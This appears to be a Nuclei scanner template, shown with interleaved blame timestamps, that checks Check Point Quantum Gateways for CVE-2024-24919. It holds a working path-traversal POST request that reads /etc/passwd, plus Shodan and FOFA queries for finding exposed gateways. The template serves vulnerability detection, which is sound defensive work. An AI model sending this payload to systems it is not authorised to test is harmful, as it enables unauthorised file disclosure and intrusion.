2024-05-30 03:36:42 +00:00
id : CVE-2024-24919
info :
2024-05-30 11:17:43 +00:00
name : Check Point Quantum Gateway - Information Disclosure
2024-05-30 03:36:42 +00:00
author : johnk3r
2024-05-30 03:48:57 +00:00
severity : high
description : |
2024-06-03 12:20:37 +00:00
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
2024-05-30 03:48:57 +00:00
reference :
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
2024-05-30 04:33:41 +00:00
- https://support.checkpoint.com/results/sk/sk182337
2024-05-30 03:36:42 +00:00
metadata :
2024-06-04 07:03:25 +00:00
verified : true
2024-05-30 03:36:42 +00:00
max-request : 1
vendor : checkpoint
2024-05-30 09:39:10 +00:00
product : quantum_security_gateway
2024-06-04 07:03:25 +00:00
shodan-query :
- html:"Check Point SSL Network"
- http.html:"check point ssl network"
fofa-query : body="check point ssl network"
2024-05-31 19:23:20 +00:00
cpe : cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
2024-05-30 09:39:10 +00:00
tags : cve,cve2024,checkpoint,lfi
2024-05-30 03:36:42 +00:00
http :
2024-05-30 04:52:03 +00:00
- raw :
- |
POST /clients/MyCRL HTTP/1.1
Host : {{Hostname}}
2024-06-03 12:20:37 +00:00
Accept-Encoding : gzip
2024-05-30 03:36:42 +00:00
2024-06-12 05:39:52 +00:00
aCSHELL/../../../../../../../etc/passwd
2024-06-04 07:03:25 +00:00
2024-05-30 03:36:42 +00:00
matchers-condition : and
matchers :
- type : regex
part : body
regex :
2024-06-03 12:20:37 +00:00
- "root:.*"
- "nobody:.*"
2024-05-30 08:52:10 +00:00
condition : and
2024-05-30 03:36:42 +00:00
- type : status
status :
2024-05-30 11:17:43 +00:00
- 200
2024-06-12 05:39:52 +00:00
# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950